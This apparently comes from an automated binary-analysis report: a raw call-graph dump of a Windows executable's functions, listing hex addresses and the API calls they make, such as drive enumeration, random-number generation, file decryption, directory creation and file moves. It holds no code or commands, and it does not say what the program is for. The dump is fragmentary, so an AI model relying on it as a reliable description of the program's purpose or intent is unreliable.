16510->16507 16523 216289 16510->16523 16511 2168fb 10 API calls 16511->16518 16512 219ef3 2 API calls 16512->16523 16513 2184c7 118 API calls 16515 216379 16513->16515 16514 215b83 16514->15606 16514->15620 17333 2169b0 16515->17333 16516 216421 GetProcessHeap HeapFree 16516->16514 16519 216437 16516->16519 16518->16514 16518->16516 16520 21a46e 12 API calls 16518->16520 16522 219a29 GetLastError 16519->16522 16520->16518 16521 2163d8 16524 2169b0 SendMessageA 16521->16524 16522->16514 16523->16502 16523->16508 16523->16510 16523->16512 16525 2163dd 16524->16525 17379 2169e3 16525->17379 16527 21639b 16530 216445 16527->16530 16535 216381 16527->16535 17361 21a003 16527->17361 16528 2169e3 EnterCriticalSection LeaveCriticalSection 16528->16535 16532 21644d 16530->16532 16533 21854a 118 API calls 16532->16533 16533->16534 16534->16511 16535->16501 16535->16521 16535->16527 16535->16528 16535->16532 17338 21a222 16535->17338 16537 215956 16536->16537 16538 215979 16536->16538 16537->16538 16541 215965 16537->16541 16539 215990 16538->16539 16540 21597e 16538->16540 16544 2184c7 118 API calls 16539->16544 16543 2184c7 118 API calls 16540->16543 16542 2184c7 118 API calls 16541->16542 16545 215974 16542->16545 16546 21598b 16543->16546 16547 21599c 16544->16547 16545->15614 16546->15614 16547->15614 16549 215e2f _memset 16548->16549 16550 2195c3 10 API calls 16549->16550 16551 215e44 16550->16551 16578 215e4a 16551->16578 18260 219663 16551->18260 16554 21854a 118 API calls 16555 216043 16554->16555 16558 21607b 16555->16558 16560 219663 12 API calls 16555->16560 16556 2199d2 6 API calls 16557 215e77 16556->16557 16559 215e87 SetEnvironmentVariableW 16557->16559 16557->16578 16561 218e6f 3 API calls 16558->16561 16563 216089 16558->16563 16564 215ec9 SetEnvironmentVariableW 16559->16564 16565 215e9e GetLastError 16559->16565 16560->16558 16561->16563 16562 216097 16569 2160a1 16562->16569 16570 218e6f 3 API calls 16562->16570 16563->16562 16566 218e6f 3 API calls 16563->16566 16565->16578 16566->16562 16569->15620 16570->16569 16578->16554 16591 215a77 GetEnvironmentVariableW 16590->16591 16592 229284 16591->16592 18287 22bf3c 16592->18287 16594 215aa8 16595 218889 16594->16595 16596 21889d 16595->16596 16599 2188a3 16595->16599 18526 219a43 GetProcessHeap HeapSize 16596->18526 16598 2188b7 lstrlenW 16600 2188c2 16598->16600 16599->16598 16599->16600 16601 2188aa 16599->16601 16600->16601 16602 2187eb 4 API calls 16600->16602 16601->15568 16602->16601 16604 218590 16603->16604 16605 21855e 16603->16605 16606 2185a8 16604->16606 16608 218e6f 3 API calls 16604->16608 16605->16604 18527 218c9a 16605->18527 16606->15571 16608->16606 16610 2184c7 118 API calls 16610->16604 16612 215bcc 16611->16612 16613 21690c 16611->16613 16612->15579 16612->15580 16614 21691a EnterCriticalSection LeaveCriticalSection 16613->16614 16619 216958 16613->16619 16615 216946 16614->16615 16616 21693b PostMessageW 16614->16616 16615->16619 16620 21694f WaitForSingleObject 16615->16620 16616->16615 16617 216979 16621 216988 16617->16621 16622 218e6f 3 API calls 16617->16622 16618 21696c DeleteCriticalSection 16618->16617 16619->16617 16619->16618 16620->16619 16623 216997 CloseHandle 16621->16623 16624 21699a 16621->16624 16622->16621 16623->16624 16624->16612 16625 2169a3 CloseHandle 16624->16625 16625->16612 16627 21a422 16626->16627 16628 21a41b CloseHandle 16626->16628 16629 21a437 GetProcessHeap HeapFree 16627->16629 16630 21a448 16627->16630 16628->16627 16629->16630 16631 21a443 16629->16631 16632 21a455 GetProcessHeap HeapFree 16630->16632 16634 218e6f 3 API calls 16630->16634 16633 219a29 GetLastError 16631->16633 16635 21a463 16632->16635 16633->16630 16634->16632 16635->15580 16637 216472 16636->16637 16638 2164cd 16636->16638 16639 216499 GetProcessHeap HeapFree 16637->16639 16644 218e6f 3 API calls 16637->16644 16646 216497 16637->16646 18595 219c21 16637->18595 16638->15589 16641 2164b1 16639->16641 16642 2164b6 16639->16642 16643 219a29 GetLastError 16641->16643 16642->16638 18606 2192bb 16642->18606 16643->16642 16644->16637 16646->16639 16648 215cfd 16647->16648 16650 215cf6 16647->16650 16648->16650 16651 215d24 16648->16651 16649 219166 6 API calls 16652 215d8c 16649->16652 16650->16649 16653 219166 6 API calls 16651->16653 16654 215da1 16652->16654 16655 215d90 16652->16655 16656 215d31 16653->16656 16658 215da9 16654->16658 16659 215dcd 16654->16659 16657 21854a 118 API calls 16655->16657 16656->16655 16661 215d35 16656->16661 16662 215d9c 16657->16662 16663 219166 6 API calls 16658->16663 16660 2292a7 99 API calls 16659->16660 16665 215d53 16660->16665 18643 218dae 16661->18643 16667 215df6 16662->16667 16669 218e6f 3 API calls 16662->16669 16664 215dbc MessageBoxW 16663->16664 16664->16665 16665->16662 16673 218e6f 3 API calls 16665->16673 16670 215e04 16667->16670 16674 218e6f 3 API calls 16667->16674 16669->16667 16670->15588 16671 215d47 16675 21854a 118 API calls 16671->16675 16672 215d5b 16676 218abb 6 API calls 16672->16676 16673->16662 16674->16670 16675->16665 16677 215d67 16676->16677 16677->16654 16678 215d6b 16677->16678 16679 21854a 118 API calls 16678->16679 16679->16665 18652 232fe1 16680->18652 16687 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16688 215c14 16687->16688 16689 218e9c GetTimeZoneInformation GetSystemTime SystemTimeToTzSpecificLocalTime 16688->16689 16690 218b7e 112 API calls 16689->16690 16691 218f06 16690->16691 16692 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16691->16692 16693 215c25 16692->16693 16693->15601 16693->15603 16695 218e8a 16694->16695 16696 218e8e 16694->16696 16695->15605 16697 219a29 GetLastError 16696->16697 16697->16695 16699 2199dd 16698->16699 16701 219a21 16699->16701 16702 2199e8 GetModuleFileNameW 16699->16702 16706 2187eb 16699->16706 16701->16444 16703 219a04 GetLastError 16702->16703 16704 2199f7 16702->16704 16705 219a00 16703->16705 16704->16699 16704->16705 16705->16701 16707 218820 16706->16707 16708 2187f7 16706->16708 16707->16699 16709 218811 GetProcessHeap HeapAlloc 16708->16709 16710 218800 GetProcessHeap HeapReAlloc 16708->16710 16709->16707 16710->16707 16738 219926 16711->16738 16714 219cc1 CreateFileW 16715 219cda 16714->16715 16716 21843a 16715->16716 16717 218e6f 3 API calls 16715->16717 16716->16464 16716->16465 16717->16716 16719 2185f5 16718->16719 16732 2186d9 16718->16732 16720 218601 GetModuleFileNameW 16719->16720 16719->16732 16721 218619 _memset 16720->16721 16759 219a63 16721->16759 16722 2186f2 16725 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16722->16725 16724 218e6f 3 API calls 16724->16722 16726 218700 16725->16726 16726->16467 16729 218671 _memset 16730 218e9c 115 API calls 16729->16730 16731 21868d 16730->16731 16731->16732 16733 2184c7 118 API calls 16731->16733 16732->16722 16732->16724 16734 2186a5 16733->16734 16735 2184c7 118 API calls 16734->16735 16736 2186c8 16735->16736 16737 2184c7 118 API calls 16736->16737 16737->16732 16739 218889 7 API calls 16738->16739 16742 219938 16739->16742 16740 219972 16740->16714 16740->16715 16741 218e6f 3 API calls 16741->16740 16744 219960 16742->16744 16745 219871 16742->16745 16744->16740 16744->16741 16747 21988e 16745->16747 16746 219913 16746->16744 16747->16746 16750 2198b5 ___BuildCatchObjectHelper 16747->16750 16751 219a43 GetProcessHeap HeapSize 16747->16751 16750->16746 16752 2189d6 16750->16752 16751->16750 16753 2189f1 16752->16753 16755 2189f7 16752->16755 16758 219a43 GetProcessHeap HeapSize 16753->16758 16756 2187eb 4 API calls 16755->16756 16757 2189fe _memmove ___BuildCatchObjectHelper 16755->16757 16756->16757 16757->16746 16758->16755 16760 219926 10 API calls 16759->16760 16761 219a86 16760->16761 16762 219a90 GetFileVersionInfoSizeW 16761->16762 16767 219ab0 16761->16767 16764 219aa4 GetLastError 16762->16764 16765 219ace GlobalAlloc 16762->16765 16763 218645 GetComputerNameW 16763->16729 16764->16767 16765->16767 16768 219ae4 GetFileVersionInfoW 16765->16768 16766 218e6f 3 API calls 16766->16763 16767->16763 16767->16766 16769 219b10 GetLastError 16768->16769 16770 219af6 VerQueryValueW 16768->16770 16772 219b1c GlobalFree 16769->16772 16770->16769 16770->16772 16772->16767 16774 219ca3 11 API calls 16773->16774 16775 219d1f 16774->16775 16776 219d29 GetLastError 16775->16776 16777 219d4c GetProcessHeap HeapAlloc 16775->16777 16778 2160c2 16776->16778 16779 219d63 16777->16779 16778->16473 16778->16474 16782 218889 7 API calls 16779->16782 16787 219d91 16779->16787 16780 219da2 16783 21a414 8 API calls 16780->16783 16781 219da9 16781->16778 16784 219daf CloseHandle 16781->16784 16785 219d86 16782->16785 16783->16781 16784->16778 16785->16787 16788 21a505 16785->16788 16787->16780 16787->16781 16804 219b6a SetFilePointerEx 16788->16804 16790 21a566 16790->16787 16791 21a572 GetProcessHeap RtlReAllocateHeap 16794 21a603 16791->16794 16795 21a52c 16791->16795 16792 21a54f GetProcessHeap RtlAllocateHeap 16792->16790 16793 21a58e ReadFile 16792->16793 16793->16795 16796 21a60c GetLastError 16793->16796 16794->16790 16797 21a65e GetProcessHeap HeapFree 16794->16797 16795->16790 16795->16791 16795->16792 16795->16793 16799 21a5da 16795->16799 16796->16794 16797->16790 16798 21a670 16797->16798 16807 219a29 GetLastError 16798->16807 16799->16794 16801 21a5de GetProcessHeap HeapAlloc 16799->16801 16801->16794 16802 21a5ef GetProcessHeap HeapAlloc 16801->16802 16802->16794 16803 21a635 _memmove 16802->16803 16803->16794 16805 219b96 16804->16805 16806 219b8c GetLastError 16804->16806 16805->16795 16806->16805 16808 219a33 16807->16808 16808->16790 16810 219de2 16809->16810 16811 219dec 16809->16811 16810->16477 16853 21a3dc GetProcessHeap HeapAlloc 16811->16853 16814 219e02 GetProcessHeap HeapAlloc 16815 219e21 16814->16815 16816 219e2b 16814->16816 16815->16810 16817 21a46e 12 API calls 16815->16817 16818 219e57 16816->16818 16820 218889 7 API calls 16816->16820 16817->16810 16818->16815 16819 219e7e GetCurrentProcess GetCurrentProcess DuplicateHandle 16818->16819 16821 219e6c 16818->16821 16822 219ea7 16819->16822 16823 219e9b GetLastError 16819->16823 16820->16818 16873 21a7b1 16821->16873 16822->16815 16825 218889 7 API calls 16822->16825 16823->16822 16827 219ec4 16825->16827 16827->16815 16855 21ab0c 16827->16855 16830 219f1a 16829->16830 16831 219f47 GetProcessHeap HeapAlloc 16830->16831 16832 219f64 16830->16832 16831->16832 16832->16481 16834 21a475 FindCloseChangeNotification 16833->16834 16835 21a47c 16833->16835 16834->16835 16836 21a491 GetProcessHeap HeapFree 16835->16836 16837 21a4a2 16835->16837 16836->16837 16838 21a49d 16836->16838 16839 21a4a9 GetProcessHeap HeapFree 16837->16839 16840 21a4ba 16837->16840 16841 219a29 GetLastError 16838->16841 16839->16840 16842 21a4b5 16839->16842 16843 21a4c1 GetProcessHeap HeapFree 16840->16843 16844 21a4d2 16840->16844 16841->16837 16845 219a29 GetLastError 16842->16845 16843->16844 16846 21a4cd 16843->16846 16847 21a4df 16844->16847 16850 218e6f 3 API calls 16844->16850 16845->16840 16849 219a29 GetLastError 16846->16849 16848 21a4ec GetProcessHeap HeapFree 16847->16848 16851 218e6f 3 API calls 16847->16851 16852 21a4fa 16848->16852 16849->16844 16850->16847 16851->16848 16852->16481 16854 219df5 16853->16854 16854->16814 16854->16815 16856 219b6a 2 API calls 16855->16856 16857 21ab35 16856->16857 16858 21ab64 16857->16858 16859 21ab40 ReadFile 16857->16859 16862 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16858->16862 16860 21ab57 GetLastError 16859->16860 16861 21ab86 16859->16861 16860->16858 16861->16858 16863 21ab98 GetProcessHeap HeapAlloc 16861->16863 16864 21ac60 16862->16864 16865 21abb2 16863->16865 16866 21abbe 16863->16866 16864->16815 16865->16858 16867 21abce ReadFile 16866->16867 16869 21abf3 16866->16869 16867->16866 16868 21ac01 GetLastError 16867->16868 16868->16869 16869->16858 16870 21ac37 GetProcessHeap HeapFree 16869->16870 16870->16858 16871 21ac4c 16870->16871 16872 219a29 GetLastError 16871->16872 16872->16858 16900 219711 16873->16900 16876 21a984 16878 21a997 16876->16878 16880 218e6f 3 API calls 16876->16880 16877 218889 7 API calls 16879 21a810 16877->16879 16881 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16878->16881 16882 21a96f 16879->16882 16904 218abb 16879->16904 16880->16878 16883 219e7c 16881->16883 16882->16876 16885 218e6f 3 API calls 16882->16885 16883->16827 16885->16876 16886 21a82b 16886->16882 16887 21a835 FindFirstFileW 16886->16887 16888 21a853 GetLastError 16887->16888 16890 21a85f 16887->16890 16888->16890 16889 21a8f7 FindNextFileW 16889->16890 16893 21a912 16889->16893 16890->16882 16890->16889 16892 218889 7 API calls 16890->16892 16890->16893 16896 218abb 6 API calls 16890->16896 16898 21a914 16890->16898 16910 21a9ae 16890->16910 16891 21a935 16891->16882 16895 21a963 FindClose 16891->16895 16892->16890 16893->16891 16894 21a94e CloseHandle 16893->16894 16894->16891 16895->16882 16896->16890 16899 218889 7 API calls 16898->16899 16899->16893 16901 219761 16900->16901 16902 219724 16900->16902 16901->16876 16901->16877 16902->16901 16903 218889 7 API calls 16902->16903 16903->16901 16905 218ad1 16904->16905 16908 218ad7 16904->16908 16921 219a43 GetProcessHeap HeapSize 16905->16921 16907 2187eb 4 API calls 16909 218ade 16907->16909 16908->16907 16908->16909 16909->16886 16911 219ca3 11 API calls 16910->16911 16912 21a9e7 16911->16912 16913 21aa1d ReadFile 16912->16913 16914 21a9ee GetLastError 16912->16914 16916 21aa36 GetLastError 16913->16916 16920 21aa43 16913->16920 16915 21a9fb 16914->16915 16917 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16915->16917 16916->16920 16919 21ab03 16917->16919 16918 21aaec CloseHandle 16918->16915 16919->16890 16920->16915 16920->16918 16921->16908 16923 216f74 16922->16923 16924 216f9a 16923->16924 16925 216fa7 16923->16925 16927 216f83 16923->16927 16926 216f09 16924->16926 16929 216fc9 GetModuleHandleW DialogBoxParamW 16924->16929 16933 216fa0 16924->16933 16965 2173a1 16925->16965 16926->16491 16938 2191d3 16926->16938 16985 2195c3 16927->16985 16929->16926 16931 216fe9 16929->16931 16934 21854a 118 API calls 16931->16934 16936 21854a 118 API calls 16933->16936 16935 216ff4 16934->16935 16935->16926 16935->16933 16936->16926 16937 21854a 118 API calls 16937->16924 16939 219926 10 API calls 16938->16939 16940 2191eb 16939->16940 16941 21924e 16940->16941 16942 2191f8 GetFileAttributesW 16940->16942 16945 216f20 16941->16945 16946 218e6f 3 API calls 16941->16946 16943 219204 16942->16943 16944 21920c CreateDirectoryW 16942->16944 16943->16941 16943->16944 16944->16941 16947 21921e GetLastError 16944->16947 16945->16491 16945->16495 16946->16945 16947->16941 16948 21922b 16947->16948 16948->16941 16949 2191d3 10 API calls 16948->16949 16950 219263 16949->16950 16950->16941 16951 21926f CreateDirectoryW 16950->16951 16951->16941 16952 21927d GetLastError 16951->16952 16953 21928a 16952->16953 16953->16941 16955 217c20 LoadLibraryW 16954->16955 16956 217c8c DecryptFileW 16954->16956 16958 217c53 GetProcAddress 16955->16958 16959 217c2f GetLastError 16955->16959 16957 217c9b GetLastError 16956->16957 16964 216f3d 16956->16964 16961 217ca5 16957->16961 16958->16956 16960 217c68 GetLastError 16958->16960 16962 217c39 16959->16962 16960->16962 16963 21854a 118 API calls 16961->16963 16962->16961 16963->16964 16964->16498 16996 21774a 16965->16996 16968 2173c7 16970 21854a 118 API calls 16968->16970 16969 2173d6 17036 21751d CryptAcquireContextA 16969->17036 16972 2173d2 16970->16972 16974 21745d 16972->16974 16978 218e6f 3 API calls 16972->16978 16974->16924 16976 2173ec 16977 218abb 6 API calls 16976->16977 16983 2173f2 16976->16983 16979 217406 16977->16979 16978->16974 16979->16983 17066 21997e 16979->17066 16980 21854a 118 API calls 16981 21742c 16980->16981 16981->16972 16984 218e6f 3 API calls 16981->16984 16983->16980 16983->16981 16984->16972 16986 2187eb 4 API calls 16985->16986 16987 2195db GetCurrentDirectoryW 16986->16987 16988 2195f0 16987->16988 16989 21960d GetLastError 16987->16989 16990 2187eb 4 API calls 16988->16990 16995 219619 16988->16995 16989->16995 16991 2195fd 16990->16991 16994 219603 GetCurrentDirectoryW 16991->16994 16991->16995 16992 216f89 16992->16924 16992->16937 16993 218e6f 3 API calls 16993->16992 16994->16989 16994->16995 16995->16992 16995->16993 17071 217cd0 16996->17071 16999 2177a7 17001 2184c7 118 API calls 16999->17001 17000 2187eb 4 API calls 17002 21778f 17000->17002 17003 2177b6 17001->17003 17002->16999 17004 217795 17002->17004 17005 2187eb 4 API calls 17003->17005 17006 21854a 118 API calls 17004->17006 17007 2177c6 17005->17007 17008 2177a0 17006->17008 17009 2177d6 GetLogicalDriveStringsW 17007->17009 17012 2177cc 17007->17012 17014 2173c1 17008->17014 17018 218e6f 3 API calls 17008->17018 17010 217819 17009->17010 17011 2177ee GetLastError 17009->17011 17015 2187eb 4 API calls 17010->17015 17026 217834 _wcschr 17010->17026 17011->17012 17013 21854a 118 API calls 17012->17013 17016 2179de 17012->17016 17013->17016 17014->16968 17014->16969 17019 217826 17015->17019 17016->17008 17022 218e6f 3 API calls 17016->17022 17017 217841 CharUpperW 17020 2184c7 118 API calls 17017->17020 17018->17014 17019->17012 17021 21782c GetLogicalDriveStringsW 17019->17021 17020->17026 17021->17026 17022->17008 17024 2184c7 118 API calls 17024->17026 17026->17012 17026->17017 17026->17024 17029 21794e 17026->17029 17031 2178ce GetDiskFreeSpaceExW 17026->17031 17096 217a0a GetDriveTypeW SetErrorMode SetErrorMode 17026->17096 17105 21768d 17026->17105 17113 217ae7 SetErrorMode SetErrorMode 17026->17113 17028 2179ab 17028->17012 17033 2184c7 118 API calls 17028->17033 17029->17012 17029->17028 17030 21797f 17029->17030 17032 2184c7 118 API calls 17030->17032 17031->17026 17034 21798e 17032->17034 17033->17034 17035 218889 7 API calls 17034->17035 17035->17012 17037 217562 GetLastError 17036->17037 17038 21758d CryptGenRandom 17036->17038 17046 21756e 17037->17046 17039 2175a0 GetLastError 17038->17039 17051 2175cb 17038->17051 17039->17046 17040 217641 17042 217668 17040->17042 17043 21765e CryptReleaseContext 17040->17043 17041 218b7e 112 API calls 17041->17051 17045 217675 17042->17045 17047 218e6f 3 API calls 17042->17047 17043->17042 17044 21854a 118 API calls 17044->17040 17048 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17045->17048 17046->17044 17047->17045 17049 2173df 17048->17049 17049->16976 17053 21746a UuidCreate 17049->17053 17050 218abb 6 API calls 17050->17051 17051->17040 17051->17041 17051->17046 17051->17050 17052 218e6f 3 API calls 17051->17052 17052->17051 17054 2174aa 17053->17054 17055 2174b4 17054->17055 17056 2174bb UuidToStringW 17054->17056 17059 21854a 118 API calls 17055->17059 17057 2174cd 17056->17057 17057->17055 17058 2174e6 17057->17058 17060 2174e2 17059->17060 17308 218e38 17066->17308 17072 2187eb 4 API calls 17071->17072 17073 217cfc 17072->17073 17074 217d02 17073->17074 17130 21805a 17073->17130 17076 21854a 118 API calls 17074->17076 17078 217d0d 17076->17078 17079 217e8d 17078->17079 17081 218e6f 3 API calls 17078->17081 17082 218e6f 3 API calls 17079->17082 17085 217780 17079->17085 17080 217d34 GetLastError 17080->17074 17081->17079 17082->17085 17083 217d5c 17084 217d6c GetLastError 17083->17084 17093 217d97 17083->17093 17084->17074 17085->16999 17085->17000 17087 217e4b 17089 21854a 118 API calls 17087->17089 17088 217e52 17088->17078 17091 218e6f 3 API calls 17088->17091 17089->17088 17090 2184c7 118 API calls 17090->17093 17091->17078 17093->17087 17093->17088 17093->17090 17094 218abb 6 API calls 17093->17094 17095 218e6f 3 API calls 17093->17095 17164 217ee0 17093->17164 17198 218341 17093->17198 17094->17093 17095->17093 17097 217a71 CreateFileW 17096->17097 17098 217a61 17096->17098 17097->17098 17100 217a9d DeviceIoControl 17097->17100 17099 217acb SetErrorMode 17098->17099 17101 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17099->17101 17102 217ac0 CloseHandle 17100->17102 17103 217aba 17100->17103 17104 217ade 17101->17104 17102->17099 17103->17099 17103->17102 17104->17026 17106 22de40 _memset 17105->17106 17107 2176d7 QueryDosDeviceW 17106->17107 17108 2176f9 17107->17108 17112 2176f5 17107->17112 17264 229522 17108->17264 17110 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17111 217743 17110->17111 17111->17026 17112->17110 17126 217b0f 17113->17126 17114 21746a 126 API calls 17114->17126 17115 217bec 17117 21854a 118 API calls 17115->17117 17116 218b7e 112 API calls 17116->17126 17129 217bc1 17117->17129 17118 219926 10 API calls 17118->17126 17119 217bd1 17122 217bde SetErrorMode 17119->17122 17124 218e6f 3 API calls 17119->17124 17120 217b5b CreateDirectoryW 17123 217b6d RemoveDirectoryW 17120->17123 17120->17126 17121 218e6f 3 API calls 17121->17119 17122->17026 17125 217b78 MoveFileExW 17123->17125 17123->17126 17124->17122 17125->17126 17126->17114 17126->17115 17126->17116 17126->17118 17126->17120 17127 218e6f GetProcessHeap HeapFree GetLastError 17126->17127 17128 217c09 17126->17128 17126->17129 17127->17126 17128->17122 17129->17119 17129->17121 17131 21807a 17130->17131 17132 2181f6 17130->17132 17134 2187eb 4 API calls 17131->17134 17133 21823c 17132->17133 17136 218e6f 3 API calls 17132->17136 17137 217d19 17133->17137 17138 218e6f 3 API calls 17133->17138 17135 21808b 17134->17135 17139 21809b GetSystemDirectoryW 17135->17139 17142 218091 17135->17142 17136->17133 17137->17074 17137->17080 17137->17083 17138->17137 17140 2180d4 17139->17140 17141 2180a9 GetLastError 17139->17141 17144 2180fa 17140->17144 17145 2187eb 4 API calls 17140->17145 17141->17142 17143 21854a 118 API calls 17142->17143 17143->17132 17207 218b7e 17144->17207 17148 2180e2 17145->17148 17148->17142 17150 2180e8 GetSystemDirectoryW 17148->17150 17149 21811e LoadLibraryW 17151 218158 GetProcAddress 17149->17151 17152 21812d GetLastError 17149->17152 17150->17141 17153 2180f6 17150->17153 17154 218173 GetProcAddress 17151->17154 17155 2181f8 GetLastError 17151->17155 17152->17142 17153->17141 17153->17144 17154->17155 17156 218184 GetProcAddress 17154->17156 17155->17142 17156->17155 17157 218195 GetProcAddress 17156->17157 17157->17155 17158 2181a6 GetProcAddress 17157->17158 17158->17155 17159 2181b7 GetProcAddress 17158->17159 17159->17155 17160 2181c8 GetProcAddress 17159->17160 17160->17155 17161 2181d9 GetProcAddress 17160->17161 17161->17155 17162 2181ea 17161->17162 17163 2184c7 118 API calls 17162->17163 17163->17132 17165 2187eb 4 API calls 17164->17165 17166 217f03 17165->17166 17167 217f0a 17166->17167 17168 217f1c 17166->17168 17169 21854a 118 API calls 17167->17169 17227 218254 17168->17227 17171 217f15 17169->17171 17173 21804e 17171->17173 17175 218e6f 3 API calls 17171->17175 17173->17093 17174 2184c7 118 API calls 17177 217f49 17174->17177 17175->17173 17176 21854a 118 API calls 17188 217f68 17176->17188 17241 2296d7 17177->17241 17180 218011 GetProcessHeap HeapFree 17181 218024 17180->17181 17185 21801f 17180->17185 17181->17171 17186 21802a GetProcessHeap HeapFree 17181->17186 17182 217f5d 17187 2184c7 118 API calls 17182->17187 17183 217f6f 17184 218254 122 API calls 17183->17184 17189 217f80 17184->17189 17190 219a29 GetLastError 17185->17190 17186->17171 17191 218038 17186->17191 17187->17188 17188->17180 17188->17181 17192 217f34 17189->17192 17195 217f96 17189->17195 17190->17181 17193 219a29 GetLastError 17191->17193 17192->17176 17193->17171 17194 217fcd CharUpperW 17195->17188 17195->17194 17197 2184c7 118 API calls 17195->17197 17197->17195 17199 2187eb 4 API calls 17198->17199 17201 218362 17199->17201 17200 21854a 118 API calls 17202 2183bf 17200->17202 17203 2187eb 4 API calls 17201->17203 17205 218394 17201->17205 17204 21840b 17202->17204 17206 218e6f 3 API calls 17202->17206 17203->17205 17204->17093 17205->17200 17205->17202 17206->17204 17210 218b99 17207->17210 17211 218bb4 17210->17211 17212 218bda 17210->17212 17223 219a43 GetProcessHeap HeapSize 17211->17223 17214 2187eb 4 API calls 17212->17214 17220 218be6 17214->17220 17215 218bba 17216 21810b 17215->17216 17217 218bcb lstrlenW 17215->17217 17216->17142 17216->17149 17217->17212 17217->17220 17219 218c7e 17219->17216 17222 218e6f 3 API calls 17219->17222 17220->17216 17220->17219 17221 2187eb 4 API calls 17220->17221 17224 2330da 17220->17224 17221->17220 17222->17216 17223->17215 17225 233004 __vsnwprintf_l 102 API calls 17224->17225 17226 2330f2 17225->17226 17226->17220 17228 21827a 17227->17228 17229 2182a5 GetProcessHeap HeapAlloc 17228->17229 17231 218293 17228->17231 17230 2182be 17229->17230 17235 2182d5 17229->17235 17232 21854a 118 API calls 17230->17232 17233 21854a 118 API calls 17231->17233 17234 217f2d 17232->17234 17233->17234 17234->17174 17234->17192 17237 21854a 118 API calls 17235->17237 17239 21830b 17235->17239 17236 21831a GetProcessHeap HeapFree 17236->17234 17238 21832d 17236->17238 17237->17239 17240 219a29 GetLastError 17238->17240 17239->17234 17239->17236 17240->17234 17242 2296e6 17241->17242 17243 22974f 17241->17243 17245 22b059 __commit 66 API calls 17242->17245 17248 217f56 17242->17248 17249 2295cf 17243->17249 17246 2296f2 17245->17246 17247 22affd __commit 11 API calls 17246->17247 17247->17248 17248->17182 17248->17183 17250 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 17249->17250 17251 2295e3 17250->17251 17252 229610 17251->17252 17253 2295ea 17251->17253 17255 229618 17252->17255 17262 22963f 17252->17262 17254 22b059 __commit 66 API calls 17253->17254 17256 2295ef 17254->17256 17257 22b059 __commit 66 API calls 17255->17257 17267 2294ea 17264->17267 17268 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 17267->17268 17269 2294fd 17268->17269 17272 229375 17269->17272 17273 229391 17272->17273 17274 2293a5 _wcsnlen 17272->17274 17275 22b059 __commit 66 API calls 17273->17275 17274->17273 17277 2293bc 17274->17277 17314 21635a 17313->17314 17315 21678d 17313->17315 17314->16501 17314->16513 17316 2167a5 GetModuleHandleW 17315->17316 17332 21685e 17315->17332 17384 219166 17316->17384 17319 216812 CreateThread 17324 216862 WaitForSingleObject SendMessageA SendMessageA 17319->17324 17325 21682b GetLastError 17319->17325 17390 216a1b DialogBoxParamA 17319->17390 17320 2167e5 GetLastError 17329 2167f2 17320->17329 17321 2168ae DeleteCriticalSection 17322 2168bf 17321->17322 17323 2168ce 17322->17323 17326 218e6f 3 API calls 17322->17326 17327 2168e0 17323->17327 17328 2168dd CloseHandle 17323->17328 17324->17332 17325->17329 17326->17323 17327->17314 17330 2168e9 CloseHandle 17327->17330 17328->17327 17331 21854a 118 API calls 17329->17331 17330->17314 17331->17332 17332->17314 17332->17321 17332->17322 17334 2169c0 17333->17334 17335 2169ba 17333->17335 17336 2169c8 SendMessageA 17334->17336 17337 2169db 17334->17337 17335->16535 17336->17337 17337->16535 17339 21a265 17338->17339 17340 21a23a 17338->17340 17342 2199d2 6 API calls 17339->17342 17341 218889 7 API calls 17340->17341 17343 21a247 17341->17343 17348 21a259 17342->17348 17344 21a283 17343->17344 17345 21997e 6 API calls 17343->17345 17346 21a3ce 17344->17346 17347 218e6f 3 API calls 17344->17347 17345->17348 17346->16535 17347->17346 17348->17344 17349 218abb 6 API calls 17348->17349 17356 21a2c2 17348->17356 17350 21a2b0 17349->17350 17350->17344 17351 21997e 6 API calls 17350->17351 17351->17356 17352 218889 7 API calls 17352->17356 17353 21a3ab 17353->17344 17355 218e6f 3 API calls 17353->17355 17354 218abb 6 API calls 17354->17356 17355->17344 17356->17344 17356->17352 17356->17353 17356->17354 17357 21a37f 17356->17357 17359 21a337 lstrlenW 17356->17359 17394 21ac67 17356->17394 17406 21ade5 17357->17406 17359->17356 17362 21a012 _memset __write_nolock 17361->17362 17363 21a08f 17362->17363 17364 2164d8 135 API calls 17362->17364 17365 21a1a4 17363->17365 17366 219b6a 2 API calls 17363->17366 17364->17363 17368 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17365->17368 17367 21a0b5 17366->17367 17367->17365 17370 2164d8 135 API calls 17367->17370 17374 21a0da 17367->17374 17369 21a21b 17368->17369 17369->16527 17370->17374 17371 21a110 ReadFile 17372 21a198 GetLastError 17371->17372 17371->17374 17372->17365 17373 2164d8 135 API calls 17373->17374 17374->17365 17374->17371 17374->17373 17375 21a1bb 17374->17375 18256 234850 17375->18256 17378 2164d8 135 API calls 17378->17365 17380 2169f0 EnterCriticalSection 17379->17380 17381 216a12 17379->17381 17382 216a05 17380->17382 17383 216a0a LeaveCriticalSection 17380->17383 17381->16501 17382->17383 17383->17381 17389 219173 17384->17389 17385 2187eb 4 API calls 17385->17389 17386 219180 LoadStringW 17388 2191a4 